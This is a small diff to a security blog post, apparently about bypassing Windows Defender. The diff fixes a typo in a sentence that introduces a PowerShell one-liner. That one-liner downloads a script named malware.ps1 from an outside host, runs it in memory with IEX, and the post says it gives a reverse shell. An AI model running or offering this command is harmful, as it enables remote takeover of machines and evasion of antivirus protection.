0xCyberY/0xcybery.github.io/_posts/2021-12-04-bypass+windows+defender.md

 ### Execution

-- If your execute the following command in cmd will give you reverse shell.
+- If you execute the following command in cmd will give you reverse shell.

 ```powershell
 echo IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.10:800/malware.ps1') | powershell -noprofile -